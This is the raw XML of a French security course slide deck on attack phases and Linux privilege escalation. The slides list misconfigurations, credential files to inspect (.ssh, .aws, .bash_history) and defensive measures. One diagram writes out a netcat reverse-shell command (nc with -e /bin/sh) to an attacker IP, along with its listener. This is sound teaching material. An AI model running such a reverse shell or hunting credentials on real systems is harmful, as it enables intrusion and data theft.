              <a:off x="8480479" y="5460129"/>
              <a:ext cx="156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 Medium" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Medium" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Serveur cible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40D98B-B3DF-2D97-D0BB-49D2F3C938E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609654" y="5460129"/>
              <a:ext cx="417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 Medium" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Medium" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attaquant (IP 95.10.10.10)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DC66DE-A99D-E371-C9F9-6CCA32D75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589" y="4740310"/>
              <a:ext cx="5648379" cy="35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F4925A-1875-5BB1-764B-70CEAA031F90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5251797" y="4508848"/>
              <a:ext cx="1455966" cy="77082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3A8FC4"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Bk" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Bk" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Firewall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BDDDFE-9B6F-AF61-030D-4AFC2EFA1335}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7101497" y="5799692"/>
              <a:ext cx="4319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fr-B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nc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-B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 95.10.10.10 4444 -e /bin/sh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AD3C-8633-23BB-BB28-96DF590534AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1078489" y="5791636"/>
              <a:ext cx="3303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fr-B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nc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-B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 -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-B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lvp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-B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Roboto" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t> 4444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6D0CDD-C03C-55AA-FBD8-E0E18F33A826}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3775860" y="4877255"/>
              <a:ext cx="938214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Roboto" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>STDIN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3F4B4-16DA-ACCB-3949-C9530FC6AE55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7409649" y="4580183"/>
              <a:ext cx="1119186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Roboto" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>STDOUT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Petit rappel, contexte d’une attaque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CA2D6-DA15-B0BC-2C67-09F1C089C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6705"/>
          <a:ext cx="10515600" cy="261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2D6B8-ED3B-BAC9-A66A-0B4BF393AC30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591111" y="3627520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Collecte sur Google,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réseaux sociaux, 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capture réseau,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06FE-A771-ED6B-8868-BB56E3E2C22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3367659" y="3627520"/>
            <a:ext cx="25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Scan actif des ports ouverts, énumération des URL sensibles,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2FC8D-9108-435A-1521-2D1456F82507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277774" y="3633377"/>
            <a:ext cx="24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un shellcode,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attaque Metasploit,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faille connue,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6D6FB-D6E7-8EED-8282-6972E8C8CCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251545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856C0-940C-3A95-36B1-126CD067C533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000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78C0F-2901-CD7D-0FEF-3D5D04B81CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8948057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09A5E-C2BC-C1EC-3ACD-B1C8C04CD243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560787" y="4953410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Aucun bruit, on se renseigne seulement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D8DC-E6F8-CE2B-4F1B-9F795E14C697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3367659" y="4953409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cible PEUT détecter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une tentative d’attaque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A5F0B-57F8-A0E0-4BCE-5F1B090B86FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6187310" y="4953408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Intrusion initiale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 (serveur, PC portable,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DCF60-C258-F6FF-9AC4-D0FECF2C02FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9096286" y="4953407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L’attaque s’étends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 le réseau cible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8E28-5618-F3A3-3FA4-F85D9BECF434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327804" y="1690777"/>
            <a:ext cx="8945591" cy="423557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B4F93-FB10-28F1-C861-6D326A4674C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9403691" y="2208362"/>
            <a:ext cx="1572284" cy="6015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Quelques pistes intéressantes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Emplacements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à inspecter dans $HOME un serveur Linux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Historique Bash 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(.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err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bash_history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Fichiers cachés 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(.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err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gpg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, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err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aws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Clés privées mises en clair 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(.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err="1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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="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rPr>
              <a:t>, …)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2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164547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Techniques d’élévation de privilèges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5043114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Découvrons les différentes élévations de privilèges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L’élévation, niveau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7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4B7874-B50C-EC88-9F93-67FC1DD685EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1268199" y="3304017"/>
            <a:ext cx="2019300" cy="1937186"/>
            <a:chOff x="1268199" y="3304017"/>
            <a:chExt cx="2019300" cy="1937186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Graphic 13" descr="User outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9508BFD-9880-D2AE-0196-7BFCAFD5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0649" y="3304017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3552F9-F08F-2CD1-D1F8-4DCDA94E5454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1614816" y="4218417"/>
              <a:ext cx="132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User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732E87-B718-A3B9-7613-A16877FE2475}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1268199" y="459487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Possède des droits standards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2DB142-611B-D8F1-80DD-71EEE762D7EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3516817" y="3304017"/>
            <a:ext cx="2019300" cy="1937186"/>
            <a:chOff x="3516817" y="3304017"/>
            <a:chExt cx="2019300" cy="1937186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Graphic 15" descr="User outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3CB755-2523-5DBA-2D85-5EEB462D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69267" y="330401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6F93D8-C651-33B7-2C26-720ED0B75E72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3863434" y="4224429"/>
              <a:ext cx="132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User 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35A081-9BEA-3D35-CEC1-429BE839F270}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3516817" y="459487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Possède les </a:t>
              </a:r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Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>mêmes droits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98CB1A-14BB-BB64-FF7E-3911B965F5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7683260" y="4403083"/>
            <a:ext cx="3047398" cy="1237565"/>
            <a:chOff x="7683260" y="4403083"/>
            <a:chExt cx="3047398" cy="1237565"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Graphic 24" descr="User outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39A839C5-F671-107C-8B03-B9452D4B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3260" y="4403083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28DF3A-48BC-03AF-D3C0-F27298A395E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720357" y="4587749"/>
              <a:ext cx="132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User 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0BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8711358" y="4994317"/>
              <a:ext cx="20193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/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                </a:rPr>
                <a:t>Possède des droits standards</a:t>
              </a:r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FE686CD-89A2-4350-AA34-3CF46AAEC234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2863970" y="3802145"/>
            <a:ext cx="1082600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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B93E4-09A3-CB2E-07ED-7CD29207205E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7683260" y="3144328"/>
            <a:ext cx="3056397" cy="1242529"/>
            <a:chOff x="7683260" y="3144328"/>
            <a:chExt cx="3056397" cy="1242529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Graphic 11" descr="User Crown Male outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3063BEAE-B238-4284-27B7-45EC27FD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3260" y="314432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9E72B9-9F8E-2DBD-2310-766498BEE14B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720357" y="3183147"/>
              <a:ext cx="132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Root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253A4-6E74-7173-EA0E-B69424E6D48D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720357" y="358878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Possède </a:t>
              </a:r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Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>tous les droits</a:t>
              </a:r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système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944F12B-8F65-4E77-377A-6ACD930BCE03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7903005" y="3964736"/>
              <a:ext cx="474910" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3A8FC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1892E2-095E-28A3-842E-4083C3CFCB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="935910" y="2069660"/>
            <a:ext cx="4790419" cy="789957"/>
            <a:chOff x="935910" y="2069660"/>
            <a:chExt cx="4790419" cy="7899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ACF5D-2DE3-BCF5-7FB7-0FFCE4D5D11B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929443" y="2069660"/>
              <a:ext cx="2803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7384D"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Elévation horizontale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C08AB2-B977-6B21-6C29-86904DE7B76E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="935910" y="2490285"/>
              <a:ext cx="4790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Un mouvement latéral sans nouveaux droits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293E5-752F-66EB-7358-39742817C11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6284517" y="2070000"/>
            <a:ext cx="4790419" cy="785668"/>
            <a:chOff x="6284517" y="2070000"/>
            <a:chExt cx="4790419" cy="7856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AA4A3-7E8B-E0AA-EA4E-D11396E97DF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7459204" y="2070000"/>
              <a:ext cx="244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7384D"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Elévation verticale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722287-8985-02D1-FAF5-15B984815B22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284517" y="2486336"/>
              <a:ext cx="4790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Des nouveaux droits système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5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L’élévation, niveau réseau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8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FE686CD-89A2-4350-AA34-3CF46AAEC234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2863970" y="3802145"/>
            <a:ext cx="1082600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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944F12B-8F65-4E77-377A-6ACD930BCE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7903005" y="3964736"/>
            <a:ext cx="474910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A8F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1E01E-F5A0-B96F-964B-27B9B8354C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="935910" y="2069660"/>
            <a:ext cx="4790419" cy="789957"/>
            <a:chOff x="935910" y="2069660"/>
            <a:chExt cx="4790419" cy="7899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ACF5D-2DE3-BCF5-7FB7-0FFCE4D5D11B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929443" y="2069660"/>
              <a:ext cx="2803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7384D"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Elévation horizontale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C08AB2-B977-6B21-6C29-86904DE7B76E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="935910" y="2490285"/>
              <a:ext cx="4790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Un mouvement latéral sans nouveaux droits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FE4583-C7DD-3214-2BEA-D4380CC8B9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6284517" y="2070000"/>
            <a:ext cx="4790419" cy="785668"/>
            <a:chOff x="6284517" y="2070000"/>
            <a:chExt cx="4790419" cy="7856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AA4A3-7E8B-E0AA-EA4E-D11396E97DF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7459204" y="2070000"/>
              <a:ext cx="2441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7384D"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Bold" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Elévation verticale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722287-8985-02D1-FAF5-15B984815B22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284517" y="2486336"/>
              <a:ext cx="4790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Des nouveaux droits système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47018-52CB-A3E3-A5F5-4EA4438B1D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7689011" y="2997546"/>
            <a:ext cx="3609538" cy="1237567"/>
            <a:chOff x="7689011" y="2997546"/>
            <a:chExt cx="3609538" cy="12375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9E72B9-9F8E-2DBD-2310-766498BEE14B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720356" y="3183147"/>
              <a:ext cx="257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VLAN 2 - Prod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253A4-6E74-7173-EA0E-B69424E6D48D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720357" y="358878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Possède </a:t>
              </a:r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Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>les données de prod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18B41013-2559-FFDA-7916-6E24FFDC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9011" y="2997546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3B58FC-D94A-28C5-14CB-FC49483DE914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1268199" y="3250687"/>
            <a:ext cx="2019300" cy="1990516"/>
            <a:chOff x="1268199" y="3250687"/>
            <a:chExt cx="2019300" cy="19905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3552F9-F08F-2CD1-D1F8-4DCDA94E5454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1268199" y="4218417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VLAN 1 - Dev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732E87-B718-A3B9-7613-A16877FE2475}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1268199" y="459487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Développeur A dans un réseau</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Graphic 6" descr="Programmer male outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B192823-6A69-0A72-DB96-8E50FB89D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6873" y="3250687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90474-49EC-61BC-D264-F9D2F2D6D5E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3326605" y="3250687"/>
            <a:ext cx="2399724" cy="1990516"/>
            <a:chOff x="3326605" y="3250687"/>
            <a:chExt cx="2399724" cy="19905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6F93D8-C651-33B7-2C26-720ED0B75E72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3326605" y="4224429"/>
              <a:ext cx="239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VLAN 1 - Dev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35A081-9BEA-3D35-CEC1-429BE839F270}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3516817" y="4594872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Développeur B,</a:t>
              </a:r>
            </a:p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Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>même réseau</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Graphic 10" descr="Programmer male outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D931E3A-CA96-0700-7DEA-5FB2E2BFA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7970" y="3250687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AB029-7D6E-D2D0-CA3A-A2BDC1679ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7689011" y="4460837"/>
            <a:ext cx="3041647" cy="1179811"/>
            <a:chOff x="7689011" y="4460837"/>
            <a:chExt cx="3041647" cy="11798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28DF3A-48BC-03AF-D3C0-F27298A395E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8720356" y="4587749"/>
              <a:ext cx="185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17384D"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>VLAN 1 - Dev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0BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8711358" y="4994317"/>
              <a:ext cx="2019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Développeur A dans un réseau</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Graphic 14" descr="Programmer male outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4CD3F83-F921-C658-FEBE-35240BF6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9011" y="44608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5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Votre allié : les mauvaises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162901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Identifier des points faibles dû à une mauvaise configuration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Droits trop souples (777,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Service qui tourne avec droits root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Exécutables avec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SUID = Set User ID (on exécute le binaire en tant que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Fichiers de conf des services, manque de logs, … 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Comptes par défaut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Docker accessible facilement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9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CFEF6-5174-4D44-973D-BCE6C37B4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AC77E4-EFB2-4CD0-8B29-08CFAA04AF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A5688B-96E6-434E-8EA5-F7A147D23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970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Inventaire &amp; élévation de privilèges</vt:lpstr>
      <vt:lpstr>Objectifs du cours (2h)</vt:lpstr>
      <vt:lpstr>Une récap’ de lundi (inventaire)</vt:lpstr>
      <vt:lpstr>Petit rappel, contexte d’une attaque</vt:lpstr>
      <vt:lpstr>Quelques pistes intéressantes </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>L’élévation, niveau machine</vt:lpstr>
      <vt:lpstr>L’élévation, niveau réseau</vt:lpstr>
      <vt:lpstr>Votre allié : les mauvaises configurations</vt:lpstr>
      <vt:lpstr>Techniques d’élévation verticales</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Analyse, plans &amp; inventaire réguliers</vt:lpstr>
      <vt:lpstr>Une installation initiale bétonnée</vt:lpstr>
      <vt:lpstr>Un Security Operations Center avec SIEM</vt:lpstr>
      <vt:lpstr>Les autres pistes essentielles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exercice 1 / On industrialise l’inventaire !</vt:lpstr>
      <vt:lpstr>Exercice 2 / Elévation horizontale vers MySQL</vt:lpstr>
      <vt:lpstr>Exercice 3 / Elévation verticale vers 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Corentin BADOT-BERTRAND</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-04T14:44:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T18:29:55Z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0x0101000C473001E400FB41A8651FF06388E48B</vt:lpwstr>
  </property>
</Properties>
</file>